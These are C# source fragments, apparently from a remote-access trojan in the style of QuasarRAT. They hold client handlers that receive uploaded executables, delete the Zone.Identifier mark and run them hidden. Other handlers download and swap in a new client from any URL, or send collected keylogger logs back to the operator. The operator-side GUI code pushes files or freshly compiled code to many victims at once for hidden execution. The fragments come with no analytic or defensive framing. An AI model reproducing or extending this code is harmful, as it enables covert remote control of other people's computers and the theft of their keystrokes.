public static void HandleDoUploadAndExecute(DoUploadAndExecute command, Networking.Client client)
{
if (!RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Add(command.Id, FileHelper.GetTempFilePath(Path.GetExtension(command.FileName)));
}
string filePath = RenamedFiles[command.Id];
try
{
if (command.CurrentBlock == 0 && Path.GetExtension(filePath) == ".exe" && !FileHelper.HasExecutableIdentifier(command.Block))
{
throw new Exception("No executable file");
}
var destFile = new FileSplitLegacy(filePath);
if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
{
throw new Exception(destFile.LastError);
}
if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute
{
if (RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Remove(command.Id);
}
FileHelper.DeleteZoneIdentifier(filePath);
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = false;
startInfo.FileName = filePath;
Process.Start(startInfo);
client.Send(new SetStatus {
Message = "Executed File"
});
}
}
catch (Exception ex)
{
if (RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Remove(command.Id);
}
NativeMethods.DeleteFile(filePath);
client.Send(new SetStatus {
Message = $"Execution failed: {ex.Message}"
});
}
}
private void Execute(ISender client, GetKeyloggerLogsResponse message)
{
if (message.FileCount == 0)
{
OnReport("Ready");
return;
}
// don't escape from download directory
if (FileHelper.HasIllegalCharacters(message.Filename))
{
// disconnect malicious client
client.Disconnect();
return;
}
if (!Directory.Exists(_baseDownloadPath))
{
Directory.CreateDirectory(_baseDownloadPath);
}
string downloadPath = Path.Combine(_baseDownloadPath, message.Filename + ".html");
var destFile = new FileSplitLegacy(downloadPath);
destFile.AppendBlock(message.Block, message.CurrentBlock);
if (message.CurrentBlock + 1 == message.MaxBlocks)
{
try
{
File.WriteAllText(downloadPath, FileHelper.ReadLogFile(downloadPath, _client.Value.AesInstance));
}
catch (Exception)
{
OnReport("Failed to write logs");
}
if (message.Index == message.FileCount)
{
OnReport("Ready");
}
}
}
private void localFileToolStripMenuItem_Click(object sender, EventArgs e)
{
// TODO: Refactor file upload
if (lstClients.SelectedItems.Count != 0)
{
using (var frm = new FrmUploadAndExecute(lstClients.SelectedItems.Count))
{
if (frm.ShowDialog() == DialogResult.OK && File.Exists(frm.LocalFilePath))
{
string path = frm.LocalFilePath;
bool hidden = frm.Hidden;
new Thread(() =>
{
bool error = false;
foreach (Client c in GetSelectedClients())
{
if (c == null)
{
continue;
}
if (error)
{
continue;
}
var srcFile = new FileSplitLegacy(path);
if (srcFile.MaxBlocks < 0)
{
MessageBox.Show(string.Format("Error reading file: {0}", srcFile.LastError),
"Upload aborted", MessageBoxButtons.OK, MessageBoxIcon.Warning);
error = true;
break;
}
int id = FileTransfer.GetRandomTransferId();
// SetStatusByClient(this, c, "Uploading file...");
for (int currentBlock = 0; currentBlock < srcFile.MaxBlocks; currentBlock++)
{
byte[] block;
if (srcFile.ReadBlock(currentBlock, out block))
{
c.SendBlocking(new DoUploadAndExecute
{
Id = id,
FileName = Path.GetFileName(path),
Block = block,
MaxBlocks = srcFile.MaxBlocks,
CurrentBlock = currentBlock,
RunHidden = hidden
});
}
else
{
MessageBox.Show(string.Format("Error reading file: {0}", srcFile.LastError),
"Upload aborted", MessageBoxButtons.OK, MessageBoxIcon.Warning);
error = true;
break;
}
}
}
}).Start();
}
}
}
}
private void updateToolStripMenuItem_Click(object sender, EventArgs e)
{
// TODO: Refactor file upload
if (lstClients.SelectedItems.Count != 0)
{
using (var frm = new FrmUpdate(lstClients.SelectedItems.Count))
{
if (frm.ShowDialog() == DialogResult.OK)
{
if (!frm.UseDownload && !File.Exists(frm.UploadPath))
{
return;
}
if (frm.UseDownload)
{
foreach (Client c in GetSelectedClients())
{
c.Send(new DoClientUpdate
{
Id = 0,
DownloadUrl = frm.DownloadUrl,
FileName = string.Empty,
Block = new byte[0x00],
MaxBlocks = 0,
CurrentBlock = 0
});
}
}
else
{
string path = frm.UploadPath;
new Thread(() =>
{
bool error = false;
foreach (Client c in GetSelectedClients())
{
if (c == null)
{
continue;
}
if (error)
{
continue;
}
var srcFile = new FileSplitLegacy(path);
if (srcFile.MaxBlocks < 0)
{
MessageBox.Show($"Error reading file: {srcFile.LastError}",
"Update aborted", MessageBoxButtons.OK, MessageBoxIcon.Warning);
error = true;
break;
}
int id = FileTransfer.GetRandomTransferId();
//SetStatusByClient(this, c, "Uploading file...");
for (int currentBlock = 0; currentBlock < srcFile.MaxBlocks; currentBlock++)
{
byte[] block;
if (!srcFile.ReadBlock(currentBlock, out block))
{
MessageBox.Show($"Error reading file: {srcFile.LastError}",
"Update aborted", MessageBoxButtons.OK, MessageBoxIcon.Warning);
error = true;
break;
}
c.Send(new DoClientUpdate
{
Id = id,
DownloadUrl = string.Empty,
FileName = string.Empty,
Block = block,
MaxBlocks = srcFile.MaxBlocks,
CurrentBlock = currentBlock
});
}
}
}).Start();
}
}
}
}
}
public static void HandleDoClientUpdate(DoClientUpdate command, Networking.Client client)
{
// i dont like this updating... if anyone has a better idea feel free to edit it
if (string.IsNullOrEmpty(command.DownloadUrl))
{
if (!RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Add(command.Id, FileHelper.GetTempFilePath(".exe"));
}
string filePath = RenamedFiles[command.Id];
try
{
if (command.CurrentBlock == 0 && !FileHelper.HasExecutableIdentifier(command.Block))
{
throw new Exception("No executable file");
}
var destFile = new FileSplitLegacy(filePath);
if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
{
throw new Exception(destFile.LastError);
}
if ((command.CurrentBlock + 1) == command.MaxBlocks) // Upload finished
{
if (RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Remove(command.Id);
}
client.Send(new SetStatus {
Message = "Updating..."
});
ClientUpdater.Update(client, filePath);
}
}
catch (Exception ex)
{
if (RenamedFiles.ContainsKey(command.Id))
{
RenamedFiles.Remove(command.Id);
}
NativeMethods.DeleteFile(filePath);
client.Send(new SetStatus {
Message = $"Update failed: {ex.Message}"
});
}
return;
}
new Thread(() =>
{
client.Send(new SetStatus {
Message = "Downloading file..."
});
string tempFile = FileHelper.GetTempFilePath(".exe");
try
{
using (WebClient c = new WebClient())
{
c.Proxy = null;
c.DownloadFile(command.DownloadUrl, tempFile);
}
}
catch
{
client.Send(new SetStatus {
Message = "Download failed!"
});
return;
}
client.Send(new SetStatus {
Message = "Replacing executable..."
});
ClientUpdater.Update(client, tempFile);
}).Start();
}
public static void HandleGetKeyloggerLogs(GetKeyloggerLogs command, Networking.Client client)
{
new Thread(() =>
{
try
{
int index = 1;
if (!Directory.Exists(Keylogger.LogDirectory))
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = "",
Block = new byte[0],
MaxBlocks = -1,
CurrentBlock = -1,
CustomMessage = "",
Index = index,
FileCount = 0
});
return;
}
FileInfo[] iFiles = new DirectoryInfo(Keylogger.LogDirectory).GetFiles();
if (iFiles.Length == 0)
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = "",
Block = new byte[0],
MaxBlocks = -1,
CurrentBlock = -1,
CustomMessage = "",
Index = index,
FileCount = 0
});
return;
}
foreach (FileInfo file in iFiles)
{
var srcFile = new FileSplitLegacy(file.FullName);
if (srcFile.MaxBlocks < 0)
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = "",
Block = new byte[0],
MaxBlocks = -1,
CurrentBlock = -1,
CustomMessage = srcFile.LastError,
Index = index,
FileCount = iFiles.Length
});
}
for (int currentBlock = 0; currentBlock < srcFile.MaxBlocks; currentBlock++)
{
byte[] block;
if (srcFile.ReadBlock(currentBlock, out block))
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = Path.GetFileName(file.Name),
Block = block,
MaxBlocks = srcFile.MaxBlocks,
CurrentBlock = currentBlock,
CustomMessage = srcFile.LastError,
Index = index,
FileCount = iFiles.Length
});
//Thread.Sleep(200);
}
else
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = "",
Block = new byte[0],
MaxBlocks = -1,
CurrentBlock = -1,
CustomMessage = srcFile.LastError,
Index = index,
FileCount = iFiles.Length
});
}
}
index++;
}
}
catch (Exception ex)
{
client.Send(new GetKeyloggerLogsResponse
{
Filename = "",
Block = new byte[0],
MaxBlocks = -1,
CurrentBlock = -1,
CustomMessage = ex.Message,
Index = -1,
FileCount = -1
});
}
}).Start();
}
private void ExecuteThread()
{
// get output file
string output = new Random().Next(11111, 55555).ToString() + ".exe";
// call compile
CompilerResults result = CompileCode(output);
// check for errors
if (result.Errors.Count > 0)
{
string message = "Found " + result.Errors.Count + " errors!\n\n";
foreach (CompilerError error in result.Errors)
{
message += "=== ERROR " + error.ErrorNumber + " ===\n";
message += "-- Line #" + error.Line + "\n";
message += error.ErrorText + "\n\n";
}
EndExecution(output, message);
return;
}
// split file into pieces for transfer
int clientNumber = 1;
foreach (Client client in clients)
{
Invoke((MethodInvoker)(() =>
{
lblStatus.Text = "Uploading to client #" + clientNumber + "...";
}));
FileSplitLegacy srcFile = new FileSplitLegacy(output);
if (srcFile.MaxBlocks < 0)
{
EndExecution(output, string.Format("Error reading file: {0}", srcFile.LastError));
return;
}
// generate unique transfer id
int id = FileTransfer.GetRandomTransferId();
// upload each block
for (int currentBlock = 0; currentBlock < srcFile.MaxBlocks; currentBlock++)
{
byte[] block;
if (srcFile.ReadBlock(currentBlock, out block))
{
client.SendBlocking(new DoUploadAndExecute
{
Id = id,
FileName = Path.GetFileName(output),
Block = block,
MaxBlocks = srcFile.MaxBlocks,
CurrentBlock = currentBlock,
RunHidden = cbHidden.Checked
});
}
else
{
EndExecution(output, string.Format("Error reading file: {0}", srcFile.LastError));
return;
}
}
clientNumber++;
}
EndExecution(output);
}
